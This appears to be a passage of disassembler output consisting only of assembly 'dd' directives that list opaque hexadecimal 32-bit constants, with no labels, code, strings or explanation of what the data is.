		dd 0D5A43D82h, 0A5E8B3DDh, 0EB54A054h, 9524F79Eh, 9FCD7888h
		dd 0A05CD5E3h, 0B2ACC52Ah, 5B90FAEEh, 879DC22h,	1095D5DDh
		dd 0AFA83786h, 8C85152Bh, 0E72066ECh, 0D16C29DEh, 0D288411Bh
		dd 484C4261h, 170DC9C2h, 0EA9FF9D7h, 6D025AEh, 6BCE09DBh
		dd 0ACA42172h, 9ACB24E9h, 3F054D3Fh, 9CDCE8C6h,	377191A6h
		dd 0E00F7CFEh, 6F68F646h, 22EBA25Fh, 0A729A65Dh, 0C324DDA6h
		dd 0DF183A44h, 0FB346A8Bh, 175089C3h, 336CA5DEh, 4F88C1FAh
		dd 82F3B367h, 0C7ED41A7h, 785B04Eh, 4A85F1EEh, 8FD3AB64h
		dd 945F0AE0h, 70612608h, 8946F0BEh, 5E30E09Bh, 99CFB0BEh
		dd 3515AB69h, 33D8A67Eh, 1FE2A155h, 1A107767h, 0DFCD8A2Ch
		dd 0E3B1471Fh, 0EE645EFBh, 0B3611E00h, 87751BF3h, 8F593ECFh
		dd 7A26E6B6h, 692F29A3h, 3018E6A3h, 520BB36Ah, 4CF3B05Bh
		dd 4CE5CD2h, 15D9894Fh,	0EBBB7E2Fh, 0CD8C410Bh,	976C2A27h
		dd 9489371Dh, 0A73426EEh, 874502C4h, 642EBCB2h,	6F39E9AFh
		dd 571CE085h, 6E04A96Bh, 18D2BC30h, 0FAE4984Eh,	0F7A5214Eh
		dd 0F3D0711Fh, 0C3813E20h, 0A7953BAEh, 0B48145EFh, 6E4701CBh
		dd 743CFCCBh, 584519CBh, 6C03019Fh, 4FFDE38Ah, 33EC7A97h
		dd 10FAAE5Ch, 40C7965Eh, 0E7B154C6h, 0D4945224h, 0B0925E2Dh
		dd 0BB85281Ah, 0A85816F8h, 84450206h, 6F59FC6Eh, 6C3400C7h
		dd 5CECD292h, 34F4AD9Ch, 1027A59Fh, 24E5756Eh, 0FBDA346h
		dd 0DCA14757h, 0E2DC5633h, 0DCA4450Fh, 0BC643DF3h, 0F77111F6h
		dd 61582A01h, 8837F3BFh, 8A84DBA1h, 44EACDB7h, 2A15C87Ch
		dd 60F0D664h, 1CC76966h, 0F9B99566h, 0ECBA862Ch, 0F08D81FBh
		dd 0C87D7306h, 855A0805h, 637931F7h, 955501E5h,	7828E688h
		dd 6720CA9Fh, 1427E3A7h, 4CF8B09Ah, 32F2CD60h, 1ACF7E71h
		dd 0EACA65EEh, 0F2A77629h, 0E46E1F55h, 977C3C10h, 967F370Eh
		dd 0E25714DFh, 83411B84h, 640F79C6h, 4735DBA2h,	4B04F28Fh
		dd 28F2A674h, 38DF8E76h, 0FFE9B83Eh, 0CCC8A1Ch,	0E899564Ah
		dd 0C4842C92h, 0D63C4513h, 0BC6424F3h, 0A04D01D3h, 95331DE7h
		dd 3F4901C7h, 8F25EE93h, 4CF9BBABh, 24E98F82h, 21F69461h
		dd 0FFD59D43h, 0E7C26618h, 0F8944A37h, 0B69F612Ah, 0C876181Ah
		dd 0B47E22EAh, 5DE0FEEEh, 6D58F6C2h, 8F24E4BFh,	641EC694h
		dd 34EBAE9Eh, 1EFFD96Dh, 588AF5Fh, 8D2A04Ah, 0C59D6D53h
		dd 0A3B97137h, 0D1B74524h, 0B8802EEBh, 9A531BD2h, 135B18E3h
		dd 8127F594h, 6830DE9Bh, 4A03CBC2h, 400BC893h, 2B1A1172h
		dd 1CD19F25h, 0F4DF6E56h, 0DAC5793Dh, 0DB8A8114h, 0D9943E23h
		dd 7E6B1E0Bh, 867908F0h, 955B1ADEh, 6240CB46h, 7512CEB2h
		dd 0D329E1A7h, 3FEBB554h, 1D149B5Bh, 1ABD7C6Dh,	0EECF693Dh
		dd 15987F2Fh, 0E2A23D1Ah
		dd 0C36F2E16h, 9F7A3E10h, 846C22EFh, 7D37FABBh,	730279BBh
		dd 4F35E781h, 5121E78Fh, 3FF5C27Ah, 0ED58E5Fh, 0E5CC8E4Ch
		dd 5958D4Eh, 0E797601Fh, 0D98C2C37h, 0CF975317h, 0B27A52E5h
		dd 8D6000CFh, 572BF7DBh, 466D18D1h, 5B16E2AEh, 4EE4CD8Bh
		dd 24EFA88Eh, 0EFBB45Dh, 2238854Fh, 0F8A66B31h,	0D6705D41h
		dd 0BAA45923h, 0B8863509h, 0A8591EE0h, 8A3D0B52h, 604B35C0h
		dd 7218F5A4h, 580BD091h, 2D198996h, 19FACA72h, 23C7955Fh
		dd 33C19041h, 0DB9C6753h, 0C9951533h, 0D586561Eh, 0B84F41EBh
		dd 8D532CF6h, 7F6B2AE8h, 7B1705BFh, 4B21F197h, 440CC7CBh
		dd 2F19D37Ch, 35F5A185h, 21AD2D27h, 0EDBE6E56h,	0E3DF7943h
		dd 0E1756F1Fh, 0F4645E02h, 0B95D2D0Ch, 0B5683AF8h, 0BD5412CFh
		dd 9B31E9AFh, 783AEDA3h, 5DBFEAEh, 23ECA5B4h, 2AE1CFB6h
		dd 1AC38591h, 0FCD97053h, 0FEB5830Ah, 0E1915DF1h, 0D4892EF9h
		dd 85EC66F6h, 9C3928DFh, 994D0FBBh, 642DE5D3h, 231DDD93h
		dd 7213D6B8h, 3CDEC16Bh, 34CD9E7Eh, 16CCC656h, 670F26B3h
		dd 0CB045547h, 9BA5C192h, 39278D2h, 0CF8996E0h,	0C67107B5h
		dd 2317193Eh, 334219CEh, 0D6F7B38Bh, 6BD14DEBh,	0BB3CBC72h
		dd 0D068CAE9h, 0BBB7716Ah, 0A09FD0CEh, 0F77D1A67h, 0A30F98FEh
		dd 658EE1F0h, 58209271h, 0E75D1912h, 0C36CB979h, 7748518Ah
		dd 0FB34C6F0h, 17F65D39h, 0F3026165h, 3F88C152h, 1DA27716h
		dd 3DA8F948h, 0CDDC1537h, 0EFA7626Ah, 0E8F0E281h, 0C08369E2h
		dd 4010FA59h, 0F6E5A19Ah, 0D0FB09AAh, 67E0EE8Ah, 1031F10Dh
		dd 9F18014Ah, 0EEBFFE65h, 54971BCDh, 0F3EC3AD2h, 32B41037h
		dd 0D7FC9DD6h, 0C2F3B87Dh, 0A3A9AD93h, 203B7E2Ah, 3D40D65h
		dd 0DEA368A1h, 0B4CA05h, 66AD615Ah, 0B4460DEh, 8E53CBEAh
		dd 97F930C9h, 0DC9891FFh, 0AB6166h, 97AFBEBDh, 2AD1BD5Eh
		dd 0E8FA065h, 1371A0F1h, 74079B2h, 2FB1168Bh, 1278F1F0h
		dd 1114ACFh, 48B0A90Fh,	0E3FDB672h, 1C3B522Bh, 0CBC43222h
		dd 4E3C5D15h, 0C3498123h, 1B164ECAh, 3BCC02E6h,	9C90C902h
		dd 8D6B829Fh, 0D62E017Ah, 0A5D6B2E3h, 19D039B2h, 0E33875DBh
		dd 0BBB77180h, 980F73D2h, 37B0C316h, 0D047A5CBh, 6F68DBECh
		dd 8B9AFD1Ah, 0A8465CFFh, 0B6BF36D4h, 0E614E435h, 4774F2BBh
		dd 1757B112h, 83E3A5DEh, 53B8C441h, 65D252A3h, 3147F972h
		dd 0A3DC165Ah, 0C000BBE1h, 33134D86h, 7250B4B9h, 74A69885h
		dd 1123A6CEh, 0CEC2582Bh, 0E2EBE855h, 0C733A8E2h, 5FFEC59Ah
		dd 92CA7F37h, 0C440DECDh, 2FAB655Eh, 0DBB50CB6h, 16645DCBh
		dd 46E63CA5h, 6372DC51h, 0AE41F142h, 952A5045h,	0B7F9518Ah
		dd 1581457Eh, 0A87A0B7Bh, 34832D6Bh, 0E78A5F47h, 4BF8BAEEh
		dd 0CC219302h, 7B7423E8h, 0E40FAB95h, 0B3EC2586h, 2489FE7Ah
		dd 0EB64689Fh, 35061629h, 57DB958Eh, 3678B9CEh,	5B94768Ah
		dd 6F546A22h, 0DFCC053Ch, 0AFE92532h, 3B91EC76h, 62201967h
		dd 0DFB8F28Ah, 1F5892CEh, 237407B6h, 5790C906h,	735817D0h
		dd 335608Dh, 7EE4DD4Bh,	0C38BC62Bh, 341C558Fh, 30369B7Bh
		dd 1BAC8E2Ch, 9B0A9E2h,	80B03A99h, 0EC12E1DAh, 0BB8B3168h
		dd 0A8DC0106h, 0FA27356Eh, 0E1F835FEh, 68976DA6h, 17107FDAh
		dd 1FAC2A97h, 0FF74240Ch, 6BBA319Dh, 0D58B4A60h, 90108AA9h
		dd 3CB1312Ah, 89E44246h, 0E424FE6Dh, 62C185FEh,	8913D39Eh
		dd 0BAF905BAh, 67A0DA16h, 2D7C08D5h, 0FA67CA5Ah, 0EBC47D36h
		dd 29E09932h, 20C8DAB9h, 4BC981FAh, 2B649FDEh, 3F9C2D7Dh
		dd 51844A69h, 667F1EAh,	5BFE15DBh, 0B3AE0662h, 0DDCEC57Eh
		dd 6AE2628Fh, 4B510143h, 9C79FCD2h, 36CB563h, 0D49D40Ah
		dd 3B30BFA1h, 98E3913Dh, 2FDF255Eh, 0CF08428Ah,	780A4B16h
		dd 2DC0BFA2h, 24D894CEh, 0BF78B1EBh, 0AC01ED40h, 47A26A64h
		dd 7C387h, 6D2BAC18h, 0B6B73E38h, 0E7862ACCh, 3A6B2BDFh
		dd 0DF22815Fh, 0FC9BF6E6h, 57E34EFDh, 0F021E51Eh, 8F08FED8h
		dd 0AFFC1D7Ch, 17003972h, 0F389243Dh, 0C438B19Ch, 1B548DD2h
		dd 37E32EDDh, 425C5FEh,	0F0A8E11Ah, 0D4924D30h,	445D2804h
		dd 46FC356Eh, 0A37C594Ch, 74B06CB3h, 0FB5089C2h, 0D77BBABEh
		dd 0CC8BDB26h, 6BA4DDA2h, 0A7E0068Fh, 84E1356Eh, 0CC84560Dh
		dd 0FB38E901h, 9DB125F7h, 7F646559h, 0B039F6CEh, 2534C0B0h
		dd 3F0D08EDh, 837FBCF0h, 8F2EE245h, 8AF42D89h, 64439BE0h
		dd 0F3EC3AFAh, 0BF78C1E9h, 34FC6D26h, 8380B9F2h, 876E2CF9h
		dd 7F5412C5h, 0A9F4A241h, 0F76D29A2h, 9CDB1B92h, 0FDEEE613h
		dd 33157D76h, 0A7609BD2h, 13A6661Fh, 2D7446B5h,	0E829EDE6h
		dd 97902441h, 7F25F80Eh, 8036F1CBh, 8FB18CE7h, 8640B987h
		dd 0B09FB9D2h, 3F3886D6h, 0E01410FEh, 77F0FE75h, 0E68B0E3Fh
		dd 0DE946715h, 0FFC18F37h, 0D97F424Fh, 0A18F4819h, 0B8834DFEh
		dd 8A4711D0h, 844F25D1h, 5949F7ACh, 6125B7AEh, 51F7B685h
		dd 37F87E9Eh, 0EAB47Ah,	20E47158h, 0E7B17434h, 0E39F581Ah
		dd 4A8CC7FEh, 0E676168Ah, 0B2722D86h, 0BD4502DAh, 625B07D7h
		dd 6739FDABh, 5F248B9Fh, 5A19D7C2h, 1C0385A5h, 17ECA562h
		dd 189A7C42h, 0A78E3E61h, 93EA2539h, 9FC9015Fh,	0FB266DB0h
		dd 0AE7656A8h, 312C4307h, 7B360ACCh, 0F351B7ABh, 67A0D912h
		dd 0EF91766Bh, 0DDD8D157h, 0FB01A4EBh, 64434982h, 0F3EC3A12h
		dd 0DB3BE97Bh, 0B66637D2h, 87AD0947h, 5730FE0Eh, 9D9E0604h
		dd 90B73BC7h, 1C750CB7h, 0D34C1BBEh, 1E26B711h,	90A1A31Bh
		dd 0E78F8357h, 0D3F934EEh, 699891F9h, 0FF1A33AFh, 807C7FCh
		dd 1E1FC75Fh, 6085CEB9h, 9B241DABh, 0FD2679C8h,	10F80A29h
		dd 43F7B1AAh, 2890C52Ah, 77AC1139h, 0D1FB053Eh,	1C3B2119h
		dd 0CBC432FEh, 4E1421AAh, 337CD89h, 0DD8791CAh,	6E27FCA5h
		dd 0CF1D8802h, 0DBAC25F3h, 0D69B5D6Bh, 0C293F3FEh, 0CA8538FDh
		dd 8B1C957Dh, 0FF3871A1h, 0CD91601Bh, 0F3529BF1h, 4A8C814Ah
		dd 0AFB55DAFh, 8BBA9536h, 9A4B1952h, 695507BEh,	0DF59F7BEh
		dd 43C15C76h, 9050C9D7h, 0F339D963h, 0C499D0FAh, 2BACFDA3h
		dd 0C53D8232h, 0F4DC5560h, 8C6CA695h, 0C3A34DC6h, 0F73069A6h
		dd 2BE1DA4Bh, 0A421A19Ah, 8B6E9973h, 0D56A4112h, 0C2164409h
		dd 5FCDB8CFh, 3E641C66h, 17257227h, 80A1659Eh, 0F887EDDh
		dd 2C7A7126h, 9F4EB908h, 0E39CD50Ch, 4D886655h,	0DB510D86h
		dd 2CCEDE88h, 13F1EF0Bh, 0ED0E939Ah, 0DFF243h, 0F5AC9992h
		dd 15AD651Eh, 2D6446B5h, 527CEDE6h, 0D7BAF5B7h,	7869EB5Eh
		dd 0CF0801A2h, 0EB24593Eh, 3E0FD0B2h, 156BD08Dh, 733CF5C4h
		dd 0CF213C06h, 0AB0A937h, 93CC0C66h, 0EB75AE5Ah, 4047D8Eh
		dd 1414160Fh, 0D41475EEh, 37EBB07Ch, 3B74ADF2h,	905212B5h
		dd 99582AE8h, 8F0CCD7Eh, 7868B211h, 877D39B2h, 0E477D999h
		dd 17A771AAh, 1B548DCBh, 3FEE1E5Fh, 0D8B5C53Eh,	0AFB2D9C7h
		dd 19CA9536h, 4C5F985Dh, 0C33C4B6Ah, 2194608Ah,	7C346DA7h
		dd 1751191Eh, 3404D9DEh, 9688C1FBh, 2B9109ABh, 17FC7A32h
		dd 0F3DC154Fh, 0BF9EE5E1h, 0CFA1BCD4h, 743029B4h, 18592E7Eh
		dd 2F5729B2h, 9F116CF6h, 0C2A099E7h, 2C41780Ch,	9FD8D157h
		dd 3869465Bh, 0D7D0665Fh, 0FB99F44Eh, 8C4841ECh, 6E09C96h
		dd 0C280B9F3h, 6313D1CEh, 0FC3BC155h, 9B141AAFh, 9F35AE24h
		dd 3D0D45BEh, 4929CB9Ah, 0F7D12CB4h, 0AA6059A4h, 0BF6F04C6h
		dd 5F98D218h, 0D8416AB5h
		dd 0B1D0492Fh, 2A9B574Eh, 8F12450Fh, 0F2E4E296h, 7406B37h
		dd 0A1E112CEh, 9078F1F7h, 0B538250Eh, 3D828EDh,	0E9CC053Eh
		dd 0BB710771h, 3827915Ah, 0E7608EFAh, 18A8023Bh, 20A9910Ah
		dd 12DA3A4Eh, 334C544Dh, 7BCCA60Eh, 8BE4C531h, 0B6DC3D17h
		dd 17085DB6h, 0E31C5AF6h, 0CD1A56AAh, 729F8D3Eh, 0F75D7D57h
		dd 574848FEh, 8FA2285Ch, 804592C3h, 0A7461912h,	0C3FC56D6h
		dd 0E647038Ah, 3B5E7D3Bh, 0F30416C2h, 0C06FDCD2h, 4FC8D642h
		dd 758CE1D8h, 0D7C06372h, 301F4801h, 0BFB8077Ah, 7089B385h
		dd 0F7708640h, 176485E4h, 5E68A1DAh, 3B116CC5h,	8CA099E4h
		dd 83BCF53Ah, 0EC5DDE7Fh, 0BBB46330h, 0BFD5D6FFh, 3903655Eh
		dd 0BD798110h, 2FF1CC25h, 0CA80F9C4h, 4A5ED566h, 0F4CA7CBBh
		dd 5BFECBFBh, 0E9F59962h, 33FCDAE8h, 0B67E39F2h, 0FAF29EF1h
		dd 16E5A2F1h, 0CE5210EFh, 0D45ABCC5h, 0BBDE2BE3h, 162CBC42h
		dd 8635C071h, 0DD08B665h, 40A45DD6h, 7008EC5h, 4B72E9CFh
		dd 3F78C6DAh, 68386201h, 0DC30E962h, 930CCD8Bh,	6ED9755Ah
		dd 0B0956FBh, 0E7205992h, 0C8B9BBAEh, 1F5851B2h, 12D6034Fh
		dd 0D70D904Dh, 73AC2513h, 3448013Ah, 0B0E42114h, 1D208868h
		dd 0C3EEB479h, 13189745h, 3CB1732Fh, 0E3507802h, 73A96227h
		dd 0D2C8500Eh, 0AD6119DBh, 844CFAE0h, 0A3F2328Fh, 0BFF8316Ah
		dd 48238D71h, 49EDB69Fh, 250DCCBEh, 70EAA65Eh, 8F2D723h
		dd 0F3A25E4Eh, 0D6AB7A3Ah, 0D7D84A06h, 0B4843DE7h, 93520AC2h
		dd 83542A9Eh, 903404BFh, 2B58F1A0h, 3D01CDA1h, 220ECE92h
		dd 94BDF130h, 7D5846Ch,	0EDB97161h, 0D7CD4541h,	0F0A4A116h
		dd 0D1857D0Fh, 0A062D916h, 47682DF1h, 915B170Ah, 8442F366h
		dd 6A0CD7C7h, 42ECFE5Eh, 0F9F4CA7Bh, 330F77C3h,	47BD8B77h
		dd 23D9874Fh, 33A58033h, 0E4A25346h, 0CA6C3727h, 9AAB0539h
		dd 0EF2926D7h, 940411DFh, 602C99C1h, 37DFABBh, 5253C5A3h
		dd 27F5A926h, 71B5CA87h, 90C38F92h, 0EFF35312h,	9B3FC17Ah
		dd 9EEC52AFh, 0A5A512F1h, 0E9BF4A1Dh, 2B0EC10Fh, 67EADDF1h
		dd 0CBF438CCh, 0AE595B1Fh, 4BF6467Ch, 0D1EFFA7Ch, 0A5F0114Ah
		dd 0FF3871AAh, 1B548DC6h, 3770A9E2h, 538CC5FEh,	6FA8E11Ah
		dd 8BC4FD36h, 0A7E01952h, 0C3FC356Eh, 0DF18518Ah, 0FB346DA6h
		dd 175089C2h, 336CA5DEh, 4F88C1FAh, 6BA4DD16h, 87C0F932h
		dd 0A3DC154Eh, 0BFF8316Ah, 0DB144D86h, 446F3E53h, 0B1A908DEh
		dd 2F68E103h, 24DA2275h, 5EA0D9D2h, 8A8B8C1h, 0EEDB0999h
		dd 6BF3332Dh, 0B3EC8DF9h, 0E520A785h, 7869CC3h,	0EDDBB105h
		dd 3B3EE4E6h, 5C364A97h, 0FC41F1EAh, 9B1436ECh,	0F96F2E39h
		dd 34B56766h, 672865D8h, 4B22343Bh, 27BC01D2h, 23D4B5EEh
		dd 0D498D10Ah, 0BBD211ABh, 9FC96242h, 0F36B21F2h, 16D3A37Eh
		dd 0AB0DDB1Bh, 0D0AB3CB2h, 5A712CDh, 2F97B1AAh,	0E278BD01h
		dd 73586C22h, 28451BDCh, 0AFA8437Eh, 0D70427F5h, 0EA4E8497h
		dd 0C9B165FCh, 0C58F4976h, 8774D765h, 0F27E8806h, 833A741Dh
		dd 0D69BB812h, 9696F811h, 739E3EFh, 2E1B7D8Eh, 7CBB349Eh
		dd 1B94B654h, 20F22EA5h, 538CC53Eh, 7310E11Ah, 16C4FD36h
		dd 6719A7D7h, 0F2498D6Eh, 0C7C07035h, 7E346DA6h, 5749174Fh
		dd 3BF9A5DEh, 71283E73h, 0DF3BDD56h, 0B04286BDh, 2A1B150Eh
		dd 0FFD1A3EFh, 61A1C686h, 0F3029ABh, 134C85BDh,	0AAA76A09h
		dd 4B843D85h, 0BC88AB12h, 867F4408h, 5FB17BDFh,	3E3E3066h
		dd 0CE105548h, 0F32D6C22h, 0FF9E04BAh, 40E09CD6h, 0C280B9F2h
		dd 0B4CD1CCh, 6CB8F62h,	0B46A9245h, 0F5EF29A2h,	5304BFAEh
		dd 0D8F46103h, 17162636h, 984759D1h, 0C47D6D75h, 864B10ABh
		dd 0B71D6E81h, 0C4D055FEh, 0FBC34E8Ah, 0C6DE9AF9h, 0EB24D421h
		dd 6FC1DFB2h, 2A6AA828h, 3F781C6Fh, 7513A306h, 0F2AD9E22h
		dd 9563F584h, 80E72BD1h, 61B2D547h, 941FD89Dh, 37C7E54h
		dd 0A7181627h, 0B7F0AC5Dh, 0FE90C902h, 33753F73h, 3CB0B13Ah
		dd 0AE874C10h, 739E3F7h, 4D99D48Eh, 238B193h, 9EA3B1CAh
		dd 825FABA2h, 36841B09h, 8FF16128h, 67A0BE05h, 0C3F44256h
		dd 9E183197h, 60C17CCAh, 967F6C1Dh, 9842BDEFh, 1929FDF5h
		dd 0D09295C1h, 0CC8BA6CDh, 8E26DBDh, 10FACBA5h,	40D245C6h
		dd 93EDE07Dh, 78421D71h, 6BE51255h, 0B052F549h,	2867032Dh
		dd 0E8A2CD33h, 60BF0505h, 0A6D2A5EBh, 0FB1DBFFBh, 839A482h
		dd 0C92FF4B9h, 6834C339h, 4207CB81h, 4366B9B1h,	1189ADC6h
		dd 0EC409055h, 9B143117h, 0BFE1A1C4h, 0AFCC677Ch, 4D866399h
		dd 433E971Dh, 8E4D13EAh, 4B3A38C9h, 5CBE028Dh, 4809C5FEh
		dd 4150C88Dh, 63E3385Dh, 8543CAh, 55241D7Ah, 5F26A049h
		dd 0DDDC2F86h, 8F70C6E9h, 0A8492517h, 782828EDh, 0FCC053Eh
		dd 60ED75A8h, 763AEB96h, 8F1DC4A4h, 833C75AEh, 62ABB321h
		dd 47985A73h, 0D4BBC9C2h, 736CB9EFh, 0FC8013Ah,	4B54208Ah
		dd 0F87D30C8h, 0E61C95A2h, 0F63971AAh, 1B54034Ah, 0B2BD21E2h
		dd 0FEE3DDAAh, 78127E93h, 3334FDF6h, 24CBC4A8h,	0C33C497Fh
		dd 0E018518Ah, 14BA1A2Fh, 52FC8982h, 5F3D2AF1h,	4F88C13Ah
		dd 0A0CDF16h, 0F4EAF856h, 0BFB79D53h, 0DD5F1FE1h, 0B9144D3Eh
		dd 672F1D39h, 90D7DFFBh, 2F28B50Bh, 5384BDF6h, 5F05665Ah
		dd 0B2A6CA2Eh, 5FA4E2CFh, 0BBF42D66h, 948FC186h, 0F0B865A6h
		dd 572D0462h, 3A97F8D6h, 87ACEA77h, 639CD80Eh, 0CFB4052Ah
		dd 266BA72Fh, 77E9BFE7h, 0FEBFC07Eh, 0B3F0EAD2h, 0D73502E9h
		dd 275F9992h, 1AC8B5EEh, 66B47872h, 0F1596658h,	0F2D0494Bh
		dd 92EC25B6h, 48A0ECDEh, 56245D78h, 0EEB2364Ah,	0CB7C2529h
		dd 0C68B4D25h, 0F3EEF6E5h, 0D2CAFEEDh, 204360AFh, 0AFA8358Bh
		dd 8D2F0FA9h, 0E7205991h, 92146903h, 6FEBB074h,	0F0D8501h
		dd 0BF2A884Dh, 1E46DA39h, 0C64FACCBh, 8466A2DDh, 7F2739B2h
		dd 92608D17h, 3F04422Fh, 1B5491C6h, 9F7E5DE2h, 1B0E05E7h
		dd 2FB079B1h, 0E31B01EAh, 86C791E7h, 0B4798C15h, 0D718117Eh
		dd 48346DA6h, 0EEC50978h, 336CE5B2h, 6820826Eh,	755DB62Eh
		dd 0C7EC2497h, 0A638D54Eh, 8BDF9660h, 6BAB4DC6h, 74B6D333h
		dd 138C59A9h, 29283170h, 8B70987Bh, 0FFA8312h, 87420Ch
		dd 9F18E53Bh, 0BBF42D76h, 10805056h, 0E0748B04h, 9FEF67A6h
		dd 6B53F77Eh, 0C9354249h, 129C1527h, 0BF84C2AFh, 9BD42D46h
		dd 27F9DE62h, 0FC893FB6h, 8928A1CEh, 0CBC5E558h, 53911EE5h
		dd 43BCB52Eh, 62A4D10Ah, 85CCB1A6h, 0D7BCF2E7h,	3C434B5Eh
		dd 8F21C727h, 68CFB896h, 700AD83h, 635C95CEh, 6FC8BA9Fh
		dd 67AD5204h, 0A616E962h, 0D398D6C3h, 0AFE8A15Ah, 1BFB7276h
		dd 19D63DAh, 6D3C35C2h,	67726E61h, 0B8DFB517h, 5750BD13h
		dd 73ACE61Eh, 0A85803AEh, 77BA825Ch, 0A34039B2h, 0CDB94F8Dh
		dd 1D38B19Eh, 9CFC736Dh, 28EDE0B2h, 538C85D2h, 0BCA8E118h
		dd 95FC7134h, 670C43B7h, 4C931B6Eh, 9FF1B3F7h, 175815A6h
		dd 0C6B789C2h, 0F3387663h, 4F88C9FAh, 7AB89116h, 0C7EC2AB7h
		dd 0A3D8154Eh, 0FFF466Ah, 691473Eh, 513029B6h, 90D74265h
		dd 2F28B50Bh, 4B84B5F6h, 0FFAEAA7h, 0E0B255ADh,	9F18E521h
		dd 7B23C848h, 0F51DF418h, 0FD143EF6h, 0CF54AC5Fh, 2E00DDD6h
		dd 73A75EE8h, 0CE76D5CEh, 4B89765Dh, 8BD40D86h,	1F0A2962h
		dd 0D61885FFh, 0E930251Ah, 4B30581Bh, 1E077FD2h, 2F8F3A80h
		dd 6EFFD14Ah, 0BBE01EABh
		dd 97D00942h, 63E5391Eh, 0E88543CAh, 55241D8Ah,	3371FE45h
		dd 35C958Eh, 0BDC8B1EAh, 5790CF7Bh, 0F162B89Fh,	0D398DEA3h
		dd 296DAA5Ah, 0E9047D6Fh, 0E414D9E9h, 3CC7C03h,	0DFEB604Ah
		dd 4CF1A48Ch, 57900916h, 51ACE5DEh, 5CD9E7E2h, 49BD9154h
		dd 0C118E9C9h, 23287013h, 25831AAh, 6ACC3D6Ch, 0F75C9A67h
		dd 530CC5FEh, 0FFA6361Ah, 742177B8h, 85E0D926h,	0C0C0B515h
		dd 0DF6858BFh, 3B97AC26h, 8CD4058h, 336CE5B2h, 1C88C2FAh
		dd 75E44D1Dh, 0C7EC22B7h, 0AA33AF4Eh, 7F77890Ch, 0E72DF28Ch
		dd 524A69E2h, 2A2860Eh,	6F74B25Fh, 4D84BDF6h, 0D6C3CE12h
		dd 43C806B3h, 9BD8114Ah, 4BFAA266h, 0B28D53C2h,	7D2CA572h
		dd 0CF54915Fh, 1B04DED6h, 0C85A7114h, 0E9C65B5h, 79784122h
		dd 5B0028CBh, 349B9362h, 0D34C194Fh, 0EF30619Ah, 63DE8D6Bh
		dd 0C4660151h, 43BCC914h, 60E83C2Ch, 0C364E58Dh, 83B68E38h
		dd 2242251Eh, 8F1452FFh, 0DB245D96h, 742D2AB2h,	0A6E4FBF3h
		dd 19D5BB12h, 39948D3Ah, 0D170DCB9h, 0CC425227h, 2C33211Ah
		dd 0CBC43167h, 0E7405992h, 0B2CD6403h, 67728C61h, 0D86AB5EFh
		dd 5750BD18h, 7DAB895Eh, 4FD42BDFh, 943BC356h, 739C3BFh
		dd 6D5DCF8Eh, 3F11FB0Fh, 0ABEB73C6h, 10EDAB0Ah,	0FD8C85D2h
		dd 7BB9668Dh, 8BC3FDF6h, 23E31A52h, 0C3FC35F1h,	5A34F8F2h
		dd 0CA9E8C8h, 9850C9D6h, 336CA5EFh, 4F4918F8h, 0F8A3DD16h
		dd 0E39BB137h, 1B7333D1h, 0BFF8316Ah, 0D981E8E8h, 14B7E104h
		dd 6F94E0E0h, 0CA6230BDh, 0B61E7DE5h, 93D15E25h, 83BCF56Eh
		dd 5FE5124Ah, 0C725B2D9h, 0D7104942h, 11B85D9Eh, 0E3CD191Ch
		dd 0F7552289h, 4780B932h, 0F08FD70Eh, 9DD9FB6Bh, 688D91EDh
		dd 9368CF5Ah, 0BE63EB82h, 8930F1A9h, 63DE7BDDh,	0A45E767Ah
		dd 43BCC915h, 623F3C2Ch, 4A4AA6D6h, 0D7BCFAC7h,	0B3EC255Eh
		dd 5F2815FAh, 0D4A13799h, 0C840B986h, 0AC517F2Eh, 417895E2h
		dd 1BC0E6ABh, 7A4C2922h, 3EC849BEh, 0D8E820Ah, 0D524ECEEh
		dd 0A74C82F7h, 32D35BAEh, 0DF24624Fh, 3B74CDE6h, 65FFD02h
		dd 3378B6A3h, 8FC8013Ah, 0BAD9D136h, 0C7003C35h, 5319A98Eh
		dd 925FDB3Ah, 0A0CBD44Dh, 37B0A260h, 940506E5h,	69607186h
		dd 0CBB0D6BBh, 24CBC352h, 0C33C497Fh, 0DF58518Ah, 930E699Ah
		dd 94564C72h, 332C79C7h, 0D7E2CBD1h, 0C89AFDD1h, 87802D0Bh
		dd 2027B030h, 0BFB8055Bh, 0DC144D85h, 74DB1CF6h, 138C598Fh
		dd 4F68A1DAh, 0AAFBAAAh, 67A0D911h, 134CFA82h, 1A673CA0h
		dd 3571A8B1h, 0B210898Bh, 67E4DEE6h, 8C13CAE9h,	2BA491C7h
		dd 4700B9F2h, 0E011D3E3h, 7F78C503h, 1B1405CCh,	0DF1F2C2Bh
		dd 0FC1490Bh, 0B02851BEh, 96B475D6h, 55AFC29h, 0E13CC686h
		dd 0D6F07761h, 7B5C45A6h, 38CE0942h, 5E948000h,	0CD558AFFh
		dd 2B15C5B8h, 0CAF024D4h, 17D91274h, 0CE78F1DEh, 1BC0FE8Bh
		dd 77B0E922h, 0E2C69A2Eh, 8AA0F971h, 0B3D3B88Fh, 3747D169h
		dd 0FCDAF235h, 8C59910Ah, 3B34D664h, 9317C203h,	2825E902h
		dd 8F08F197h, 845E8ADDh, 442739B2h, 0E3DC5E0Ch,	0CB09F6DDh
		dd 1B948D06h, 399CA9E2h, 15E3ED91h, 9E52E11Eh, 64166AB5h
		dd 9EE01912h, 0C3FD5EF2h, 0DF1D798Ah, 38EB6DA6h, 4B0DD770h
		dd 0EF3E77ADh, 96888D36h, 2B9155ABh, 2D3D8232h,	0F6DC5567h
		dd 0C2CC69E1h, 383BC5Eh, 0F1C2C19h, 0ACF9B5Ah, 38021651h
		dd 4E4BBDB6h, 0E429E5D0h, 83FCFEECh, 18E0D349h,	0FB1DF3EBh
		dd 0AFBFD482h, 0F3ACB8B9h, 3C3081BAh, 0B607CC88h, 87B95F3Fh
		dd 2CF40B0Eh, 0FACB905Ch, 5BFDB3DBh, 0AF36B462h, 0FE00FF7Dh
		dd 0EC91E4D4h, 0CE4F5C1h, 0A36399D2h, 437CB624h, 28FE2609h
		dd 8B3EDE6h, 97900210h,	0BA04F1CAh, 0CF08E3FFh,	0E75EDA96h
		dd 302EFE89h, 215B958Eh, 0CDF259BAh, 0F0133C01h, 77F0E2C4h
		dd 0CEC39A3Eh, 32EB2D1Dh, 0CB043E8Dh, 745965A9h, 37C7E50h
		dd 205D16C5h, 0B873ADE6h, 5750C2D0h, 0EA7466C0h, 0D345105Fh
		dd 36E41D56h, 0A273BB2h, 2C7485A2h, 0C84B10DCh,	0DB7D3383h
		dd 53EDB8E2h, 568CC5FEh, 0AFC18B9Fh, 9D410036h,	22E0D91Bh
